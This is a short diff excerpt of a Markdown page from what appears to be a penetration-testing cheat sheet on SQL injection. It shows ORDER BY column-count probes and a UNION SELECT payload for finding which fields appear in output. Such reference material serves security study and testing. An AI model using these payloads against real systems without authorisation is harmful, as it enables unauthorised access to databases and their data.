MrJester/binary_exile_cheat_sheet/_docs/6 - Web Application/Injection.md

 Once you have identified SQL injection, use order by (increase until it breaks):
 {% highlight sql %}
+dent' and 'a'='a' ORDER BY 1; #
+...
 dent' and 'a'='a' ORDER BY 5; #
 {% endhighlight %}
- See which numbers are visable in the output.
+ See which fields (e.g., numbers) are visable in the output.
 {% highlight sql %}
 Dent' UNION SELECT  '1', '2', '3', '4'; #
 {% endhighlight %}